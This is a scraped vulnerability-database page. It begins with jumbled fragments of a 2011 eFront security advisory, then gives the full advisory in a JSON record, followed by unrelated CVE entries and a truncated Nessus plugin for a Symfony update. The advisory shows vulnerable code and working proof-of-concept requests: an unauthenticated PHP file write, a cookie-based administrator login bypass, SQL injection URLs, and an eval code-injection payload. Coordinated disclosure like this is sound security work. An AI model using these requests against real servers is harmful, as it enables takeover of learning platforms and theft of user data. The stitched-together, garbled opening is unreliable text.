Input passed through $_POST['templateName'] and $_POST['templateContent'] isn't sanitized before being
used in a call to file_put_contents() at line 17, this can be exploited to write arbitrary PHP code in
a file with .php extension also if magic_quotes_gpc = on. Proof of concept request:
throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION.': '.$extension, EfrontFileException::FILE_IN_BLACK_LIST);
}
The FileSystemTree::uploadFile() method handles all uploads and It uses checkFile() method to verify the extension
of the uploaded file. Here is compared the uploaded file extension with every extension in the 'file_black_list' array,
that is constructed by this default configuration: "php,php3,jsp,asp,cgi,pl,exe,com,bat" and, as you can see, It doesn't
contains others dangerous extension like phtml, pwml, php4, php5, inc.. But the really problem is that at line 3152
the uploaded file extension is simply compared with == operator, so an attacker could be able to upload for e.g. an
avatar with .PHP extension. This is possible only if 'file_white_list' configuration is blank (such as by default).
+-----------------------------------+
| SQL Injection in UPDATE statement |
+-----------------------------------+
First look at the getUserTimeTarget() function defined into /libraries/tools.php
function getUserTimeTarget($url) {
//return $_SESSION['s_time_target'];
if (isset($_SESSION['s_lessons_ID']) && $_SESSION['s_lessons_ID']) {
case 'package_ID': $entity = array($result[1] => 'unit'); break;
default: break;
}
}
return $entity;
}
It parses the given URL, and if in the query string is defined a 'package_ID' variable his content is
used as a key for the $entity array. Now look the vulnerable code located in /www/periodic_updater.php
$result = eF_executeNew("update user_times set time=time+(".time()."-timestamp_now),timestamp_now=".time()."
where session_expired = 0 and session_custom_identifier = '".$_SESSION['s_custom_identifier']."' and users_LOGIN = '".$_SESSION['s_login']."'
and entity = '".current($entity)."' and entity_id = '"key($entity)."'");
Input passed through $_GET['HTTP_REFERER'] is passed to getUserTimeTarget() function at line 33 and the return value is
used in call to eF_executeNew() at line 38. So an attacker could request an URL like this to inject arbitrary SQL code:
In older version input is taken from $_SERVER['HTTP_REFERER'] instead of $_GET['HTTP_REFERER'], but is still vulnerable.
Successful exploitation of this vulnerability requires authentication.
Input passed through $_GET['view_unit'] isn't properly sanitized before being used in a call
to eF_getTableData() function at line 14, this can be exploited to inject arbitrary SQL code.
Successful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.
Input passed through $_GET['sent_notification_id'] isn't properly sanitized before being used in a
call to eF_getTableData() function at line 70, this can be exploited to inject arbitrary SQL code.
Successful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.
+------------------------------------------------+
| Authentication Bypass and Privilege Escalation |
+------------------------------------------------+
The vulnerable code is located in /www/index.php
if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {
Input passed through $_COOKIE['cookie_login'] isn't properly sanitized before being used at
line 208 to instanciate a new user object using EfrontUserFactory::factory() method, this can
be exploited to bypass authentication and to escalate privilege. Proof of concept request:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login[login]=admin;cookie_login[active]=1;cookie_login[user_type]=administrator;cookie_login[password]=1;cookie_password=1
Connection: keep-alive
Input passed through $_GET['course'] (or $_GET['from_course']) isn't properly sanitized before being
used to instantiate a new EfrontCourse object, this can be exploited to inject and execute arbitrary
PHP code because of EfrontCourse::checkRules() method calls eval() function using the 'rules' object's
property (see /libraries/course.class.php near lines 3638-3645). Successful exploitation of this
vulnerability requires at least a student account with at least one completed lesson.
Proof of concept request:
The latest two vulnerabilities emphasizes a critical design flaw. To understand what I means look
at the constructor method of EfrontEntity (a generic class used as parent for some objects):
throw new EfrontEntityException(_ENTITYNOTFOUND.': '.htmlspecialchars($param), EfrontEntityException :: ENTITY_NOT_EXIST);
}
$this -> {$this -> entity} = $result[0];
} else {
$this -> {$this -> entity} = $param;
}
}
If the $param variable is an array, It's used to initialize all the object properties and this
mechanism is used in almost all classes. So everytime in the code will appear something like
$object = new EfrontObject($_GET['param']);
and $_GET['param'] isn't properly sanitized, there is an high probability to lead in bugs such as
SQL Injection, PHP Code Injection, LFI etc... because an attacker could pass parameter in array
form and so he might be able to change the internal property of the objects with arbitrary data.
So I think that could there be some other bugs, for this reason I would recommend to the eFront
developers a complete source code review focused on security.
{"id": "SECURITYVULNS:DOC:27271", "bulletinFamily": "software", "title": "eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities", "description": "\r\n ----------------------------------------------------------------\r\n eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities\r\n ----------------------------------------------------------------\r\n \r\n author.............: EgiX\r\n mail...............: n0b0d13s[at]gmail[dot]com\r\n software link......: http://www.efrontlearning.net/\r\n tested versions....: 3.6.7 - 3.6.9 - 3.6.10\r\n \r\n \r\n +-----------------------+\r\n | Remote Code Execution |\r\n +-----------------------+\r\n \r\n The vulnerable code is located in /www/editor/tiny_mce/plugins/save_template/save_template.php\r\n \r\n 8. if ($_POST['templateName']) {\r\n 9. $dir = '../../../../content/editor_templates/'.$_SESSION['s_login'];\r\n 10. if (!is_dir($dir) && !mkdir($dir, 0755)) {\r\n 11. throw new Exception(_COULDNOTCREATEDIRECTORY);\r\n 12. }\r\n 13. \r\n 14. $filename = $dir.'/'.$_POST['templateName'].'.html';\r\n 15. $templateContent = $_POST['templateContent'];\r\n 16. if(file_exists($filename) === false) {\r\n 17. $ok = file_put_contents($filename, $templateContent);\r\n 18. chmod($filename, 0644);\r\n \r\n Input passed through $_POST['templateName'] and $_POST['templateContent'] isn't sanitized before being\r\n used in a call to file_put_contents() at line 17, this can be exploited to write arbitrary PHP code in\r\n a file with .php extension also if magic_quotes_gpc = on. Proof of concept request:\r\n \r\n POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1\r\n Host: localhost\r\n Content-Length: 60\r\n Content-Type: application/x-www-form-urlencoded\r\n Connection: keep-alive\r\n\r\n templateName=sh.php%00&templateContent=<?php evil_code(); ?>\r\n \r\n Successful exploitation of this vulnerability doesn't require authentication.\r\n \r\n +--------------------------+\r\n | Unrestricted File Upload |\r\n +--------------------------+\r\n \r\n The vulnerable code is located in /libraries/filesystem.class.php\r\n \r\n 3143.\t public static function checkFile($name) {\r\n 3144.\t if ($GLOBALS['configuration']['file_black_list'] != '') {\r\n 3145.\t $blackList = explode(",", $GLOBALS['configuration']['file_black_list']);\r\n 3146.\t } else {\r\n 3147.\t $blackList = array();\r\n 3148.\t }\r\n 3149.\t $blackList[] = 'php';\r\n 3150.\t $extension = pathinfo($name, PATHINFO_EXTENSION);\r\n 3151.\t foreach ($blackList as $value) {\r\n 3152.\t if ($extension == trim(mb_strtolower($value))) {\r\n 3153.\t throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION.': '.$extension, EfrontFileException::FILE_IN_BLACK_LIST);\r\n 3154.\t }\r\n \r\n The FileSystemTree::uploadFile() method handles all uploads and It uses checkFile() method to verify the extension\r\n of the uploaded file. Here is compared the uploaded file extension with every extension in the 'file_black_list' array,\r\n that is constructed by this default configuration: "php,php3,jsp,asp,cgi,pl,exe,com,bat" and, as you can see, It doesn't\r\n contains others dangerous extension like phtml, pwml, php4, php5, inc.. But the really problem is that at line 3152\r\n the uploaded file extension is simply compared with == operator, so an attacker could be able to upload for e.g. an\r\n avatar with .PHP extension. This is possible only if 'file_white_list' configuration is blank (such as by default).\r\n \r\n +-----------------------------------+\r\n | SQL Injection in UPDATE statement |\r\n +-----------------------------------+\r\n \r\n First look at the getUserTimeTarget() function defined into /libraries/tools.php\r\n \r\n 2776.\tfunction getUserTimeTarget($url) {\r\n 2777.\t //return $_SESSION['s_time_target'];\r\n 2778.\t if (isset($_SESSION['s_lessons_ID']) && $_SESSION['s_lessons_ID']) {\r\n 2779.\t $entity = array($_SESSION['s_lessons_ID'] => 'lesson');\r\n 2780.\t } else {\r\n 2781.\t $entity = array(0 => 'system');\r\n 2782.\t }\r\n 2783.\t $urlParts = parse_url($url);\r\n 2784.\t $queryParts = explode('&', $urlParts['query']);\r\n 2785.\t foreach($queryParts as $part) {\r\n 2786.\t $result = explode("=", $part);\r\n 2787.\t switch ($result[0]) {\r\n 2788.\t case 'view_unit':\r\n 2789.\t case 'package_ID': $entity = array($result[1] => 'unit'); break;\r\n 2790.\t default: break;\r\n 2791.\t }\r\n 2792.\t }\r\n 2793.\t return $entity;\r\n 2794.\t}\r\n \r\n It parses the given URL, and if in the query string is defined a 'package_ID' variable his content is\r\n used as a key for the $entity array. Now look the vulnerable code located in /www/periodic_updater.php\r\n \r\n 32. if ($_SESSION['s_login']) {\r\n 33. $entity = getUserTimeTarget($_GET['HTTP_REFERER']);\r\n 34. //$entity = $_SESSION['s_time_target'];\r\n 35. //Update times for this entity\r\n 36. $result = eF_executeNew("update user_times set time=time+(".time()."-timestamp_now),timestamp_now=".time()."\r\n 37. where session_expired = 0 and session_custom_identifier = '".$_SESSION['s_custom_identifier']."' and users_LOGIN = '".$_SESSION['s_login']."'\r\n 38. and entity = '".current($entity)."' and entity_id = '"key($entity)."'");\r\n \r\n Input passed through $_GET['HTTP_REFERER'] is passed to getUserTimeTarget() function at line 33 and the return value is\r\n used in call to eF_executeNew() at line 38. So an attacker could request an URL like this to inject arbitrary SQL code:\r\n \r\n http://localhost/efront/www/periodic_updater.php?HTTP_REFERER=http://host/?package_ID=[SQL]\r\n \r\n In older version input is taken from $_SERVER['HTTP_REFERER'] instead of $_GET['HTTP_REFERER'], but is still vulnerable.\r\n Successful exploitation of this vulnerability requires authentication.\r\n \r\n +---------------+\r\n | SQL Injection |\r\n +---------------+\r\n \r\n The vulnerable code is located in /www/js/LMSFunctions.php\r\n \r\n 13. /*These lines read SCO data for this student and pass them to the javascript code through the LMSToSCOValues variable*/\r\n 14. $result = eF_getTableData("scorm_data", "*", "users_LOGIN = '".$_SESSION['s_login']."' AND content_ID = '".$_GET['view_unit']."'");\r\n 15. sizeof($result) ? $LMSToSCOValues = $result[0] : $LMSToSCOValues = array();\r\n \r\n Input passed through $_GET['view_unit'] isn't properly sanitized before being used in a call\r\n to eF_getTableData() function at line 14, this can be exploited to inject arbitrary SQL code.\r\n Successful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.\r\n \r\n +---------------+\r\n | SQL Injection |\r\n +---------------+\r\n \r\n The vulnerable code is located in /www/send_notifications.php\r\n \r\n 69. } else if (isset($_GET['sent_notification_id'])) {\r\n 70. $sent_notification = eF_getTableData("sent_notifications", "*", "id = " . $_GET['sent_notification_id']);\r\n 71. if (!empty ($sent_notification)) {\r\n \r\n Input passed through $_GET['sent_notification_id'] isn't properly sanitized before being used in a\r\n call to eF_getTableData() function at line 70, this can be exploited to inject arbitrary SQL code.\r\n Successful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.\r\n \r\n +------------------------------------------------+\r\n | Authentication Bypass and Privilege Escalation |\r\n +------------------------------------------------+\r\n \r\n The vulnerable code is located in /www/index.php\r\n \r\n 206. if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {\r\n 207. try {\r\n 208. $user = EfrontUserFactory :: factory($_COOKIE['cookie_login']);\r\n 209. $user -> login($_COOKIE['cookie_password'], true);\r\n \r\n Input passed through $_COOKIE['cookie_login'] isn't properly sanitized before being used at\r\n line 208 to instanciate a new user object using EfrontUserFactory::factory() method, this can\r\n be exploited to bypass authentication and to escalate privilege. Proof of concept request:\r\n \r\n GET /efront/www/index.php HTTP/1.1\r\n Host: localhost\r\n Cookie: cookie_login[login]=admin;cookie_login[active]=1;cookie_login[user_type]=administrator;cookie_login[password]=1;cookie_password=1\r\n Connection: keep-alive\r\n \r\n +--------------------+\r\n | PHP Code Injection |\r\n +--------------------+\r\n \r\n The vulnerable code is located in /www/student.php\r\n \r\n 123. if (isset($_GET['course']) || isset($_GET['from_course'])) {\r\n 124. if ($_GET['course']) {\r\n 125. $course = new EfrontCourse($_GET['course']);\r\n 126. } else {\r\n 127. $course = new EfrontCourse($_GET['from_course']);\r\n 128. }\r\n 129. $eligibility = $course -> checkRules($_SESSION['s_login']);\r\n \r\n Input passed through $_GET['course'] (or $_GET['from_course']) isn't properly sanitized before being\r\n used to instantiate a new EfrontCourse object, this can be exploited to inject and execute arbitrary\r\n PHP code because of EfrontCourse::checkRules() method calls eval() function using the 'rules' object's\r\n property (see /libraries/course.class.php near lines 3638-3645). Successful exploitation of this\r\n vulnerability requires at least a student account with at least one completed lesson.\r\n Proof of concept request:\r\n \r\n /student.php?lessons_ID=1&course[id]=1&course[directions_ID]=1&course[rules]=a:1:{s:19:"1];phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}\r\n \r\n \r\n [-] Conclusion:\r\n \r\n The latest two vulnerabilities emphasizes a critical design flaw. To understand what I means look\r\n at the constructor method of EfrontEntity (a generic class used as parent for some objects):\r\n \r\n 64. public function __construct($param) {\r\n 65. if (!$this -> entity) {\r\n 66. $this -> entity = strtolower(str_replace('Efront', '', get_class($this)));\r\n 67. }\r\n 68. if (!is_array($param)) {\r\n 69. if (!eF_checkParameter($param, 'id')) {\r\n 70. throw new EfrontEntityException(_INVALIDID.': '.$param, EfrontEntityException :: INVALID_ID);\r\n 71. }\r\n 72. $result = eF_getTableData($this -> entity, "*", "id=$param");\r\n 73. if (sizeof($result) == 0) {\r\n 74. throw new EfrontEntityException(_ENTITYNOTFOUND.': '.htmlspecialchars($param), EfrontEntityException :: ENTITY_NOT_EXIST);\r\n 75. }\r\n 76. $this -> {$this -> entity} = $result[0];\r\n 77. } else {\r\n 78. $this -> {$this -> entity} = $param;\r\n 79. }\r\n 80. }\r\n \r\n If the $param variable is an array, It's used to initialize all the object properties and this\r\n mechanism is used in almost all classes. So everytime in the code will appear something like\r\n \r\n $object = new EfrontObject($_GET['param']);\r\n \r\n and $_GET['param'] isn't properly sanitized, there is an high probability to lead in bugs such as\r\n SQL Injection, PHP Code Injection, LFI etc... because an attacker could pass parameter in array\r\n form and so he might be able to change the internal property of the objects with arbitrary data.\r\n So I think that could there be some other bugs, for this reason I would recommend to the eFront\r\n developers a complete source code review focused on security.\r\n \r\n \r\n [-] Disclosure timeline:\r\n \r\n [08/10/2011] - Vulnerabilities discovered\r\n [09/10/2011] - Others vulnerabilities discovered\r\n [11/10/2011] - Issues reported to http://bugs.efrontlearning.net/browse/EF-675\r\n [26/10/2011] - Vendor update released: http://forum.efrontlearning.net/viewtopic.php?t=3501\r\n [27/10/2011] - Public disclosure\r\n \r\n", "published": "2011-11-06T00:00:00", "modified": "2011-11-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27271", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 102, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "nessus", "idList": ["FEDORA_2018-BA0B683C10.NASL", "FEDORA_2018-96D770DDC9.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27271"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 6.7}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-01-07T10:19:49", "description": "**Version 4.0.11** (2018-05-25)\n\n - bug #27364 [DI] Fix bad exception on uninitialized\n references to non-shared services (nicolas-grekas)\n\n - bug #27359 [HttpFoundation] Fix perf issue during\n MimeTypeGuesser intialization (nicolas-grekas)\n\n - security #cve-2018-11408 [SecurityBundle] Fail if\n security.http_utils cannot be configured\n\n - security #cve-2018-11406 clear CSRF tokens when the user\n is logged out\n\n - security #cve-2018-11385 migrating session for\n UsernamePasswordJsonAuthenticationListener\n\n - security #cve-2018-11385 Adding session authentication\n strategy to Guard to avoid session fixation\n\n - security #cve-2018-11385 Adding session strategy to ALL\n listeners to avoid *any* possible fixation\n\n - security #cve-2018-11386 [HttpFoundation] Break infinite\n loop in PdoSessionHandler when MySQL is in loose mode\n\n - bug #27341 [WebProfilerBundle] Fixed validator/dump\n trace CSS (yceruto)\n\n - bug #27337 [FrameworkBundle] fix typo in\n CacheClearCommand (emilielorenzo)\n\n----\n\n**Version 4.0.10** (2018-05-21)\n\n - bug #27264 [Validator] Use strict type in URL validator\n (mimol91)\n\n - bug #27267 [DependencyInjection] resolve array env vars\n (jamesthomasonjr)\n\n - bug #26781 [Form] Fix precision of\n MoneyToLocalizedStringTransformer's divisions on\n transform() (syastrebov)\n\n - bug #27286 [Translation] Add Occitan plural rule\n (kylekatarnls)\n\n - bug #27271 [DI] Allow defining bindings on\n ChildDefinition (nicolas-grekas)\n\n - bug #27246 Disallow invalid characters in session.name\n (ostrolucky)\n\n - bug #27287 [PropertyInfo] fix resolving parent|self type\n hints (nicolas-grekas)\n\n - bug #27281 [HttpKernel] Fix dealing with self/parent in\n ArgumentMetadataFactory (fabpot)\n\n - bug #24805 [Security] Fix logout (MatTheCat)\n\n - bug #27265 [DI] Shared services should not be inlined in\n non-shared ones (nicolas-grekas)\n\n - bug #27141 [Process] Suppress warnings when open_basedir\n is non-empty (cbj4074)\n\n - bug #27250 [Session] limiting :key for GET_LOCK to 64\n chars (oleg-andreyev)\n\n - bug #27237 [Debug] Fix populating error_get_last() for\n handled silent errors (nicolas-grekas)\n\n - bug #27232 [Cache][Lock] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27236 [Filesystem] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27191 [DI] Display previous error messages when\n throwing unused bindings (nicolas-grekas)\n\n - bug #27231 [FrameworkBundle] Fix cache:clear on vagrant\n (nicolas-grekas)\n\n - bug #27222 [WebProfilerBundle][Cache] Fix misses\n calculation when calling getItems (fsevestre)\n\n - bug #27227 [HttpKernel] Handle NoConfigurationException\n 'onKernelException()' (nicolas-grekas)\n\n - bug #27152 [HttpFoundation] use brace-style regex\n delimiters (xabbuh)\n\n - bug #27158 [Cache] fix logic for fetching tag versions\n on TagAwareAdapter (dmaicher)\n\n - bug #27143 [Console] By default hide the short exception\n trace line from exception messages in Symfony's commands\n (yceruto)\n\n - bug #27133 [Doctrine Bridge] fix priority for doctrine\n event listeners (dmaicher)\n\n - bug #27135 [FrameworkBundle] Use the correct service id\n for CachePoolPruneCommand in its compiler pass\n (DemonTPx)\n\n - feature #24896 Add CODE_OF_CONDUCT.md (egircys)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : php-symfony4 (2018-96d770ddc9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11406", "CVE-2018-11386", "CVE-2018-11385", "CVE-2018-11408"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-symfony4", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-96D770DDC9.NASL", "href": "https://www.tenable.com/plugins/nessus/120636", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-96d770ddc9.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120636);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11385\", \"CVE-2018-11386\", \"CVE-2018-11406\", \"CVE-2018-11408\");\n script_xref(name:\"FEDORA\", value:\"2018-96d770ddc9\");\n\n script_name(english:\"Fedora 28 : php-symfony4 (2018-96d770ddc9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"**Version 4.0.11** (2018-05-25)\n\n - bug #27364 [DI] Fix bad exception on uninitialized\n references to non-shared services (nicolas-grekas)\n\n - bug #27359 [HttpFoundation] Fix perf issue during\n MimeTypeGuesser intialization (nicolas-grekas)\n\n - security #cve-2018-11408 [SecurityBundle] Fail if\n security.http_utils cannot be configured\n\n - security #cve-2018-11406 clear CSRF tokens when the user\n is logged out\n\n - security #cve-2018-11385 migrating session for\n UsernamePasswordJsonAuthenticationListener\n\n - security #cve-2018-11385 Adding session authentication\n strategy to Guard to avoid session fixation\n\n - security #cve-2018-11385 Adding session strategy to ALL\n listeners to avoid *any* possible fixation\n\n - security #cve-2018-11386 [HttpFoundation] Break infinite\n loop in PdoSessionHandler when MySQL is in loose mode\n\n - bug #27341 [WebProfilerBundle] Fixed validator/dump\n trace CSS (yceruto)\n\n - bug #27337 [FrameworkBundle] fix typo in\n CacheClearCommand (emilielorenzo)\n\n----\n\n**Version 4.0.10** (2018-05-21)\n\n - bug #27264 [Validator] Use strict type in URL validator\n (mimol91)\n\n - bug #27267 [DependencyInjection] resolve array env vars\n (jamesthomasonjr)\n\n - bug #26781 [Form] Fix precision of\n MoneyToLocalizedStringTransformer's divisions on\n transform() (syastrebov)\n\n - bug #27286 [Translation] Add Occitan plural rule\n (kylekatarnls)\n\n - bug #27271 [DI] Allow defining bindings on\n ChildDefinition (nicolas-grekas)\n\n - bug #27246 Disallow invalid characters in session.name\n (ostrolucky)\n\n - bug #27287 [PropertyInfo] fix resolving parent|self type\n hints (nicolas-grekas)\n\n - bug #27281 [HttpKernel] Fix dealing with self/parent in\n ArgumentMetadataFactory (fabpot)\n\n - bug #24805 [Security] Fix logout (MatTheCat)\n\n - bug #27265 [DI] Shared services should not be inlined in\n non-shared ones (nicolas-grekas)\n\n - bug #27141 [Process] Suppress warnings when open_basedir\n is non-empty (cbj4074)\n\n - bug #27250 [Session] limiting :key for GET_LOCK to 64\n chars (oleg-andreyev)\n\n - bug #27237 [Debug] Fix populating error_get_last() for\n handled silent errors (nicolas-grekas)\n\n - bug #27232 [Cache][Lock] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27236 [Filesystem] Fix usages of error_get_last()\n (nicolas-grekas)\n\n - bug #27191 [DI] Display previous error messages when\n throwing unused bindings (nicolas-grekas)\n\n - bug #27231 [FrameworkBundle] Fix cache:clear on vagrant\n (nicolas-grekas)\n\n - bug #27222 [WebProfilerBundle][Cache] Fix misses\n calculation when calling getItems (fsevestre)\n\n - bug #27227 [HttpKernel] Handle NoConfigurationException\n 'onKernelException()' (nicolas-grekas)\n\n - bug #27152 [HttpFoundation] use brace-style regex\n delimiters (xabbuh)\n\n - bug #27158 [Cache] fix logic for fetching tag versions\n on TagAwareAdapter 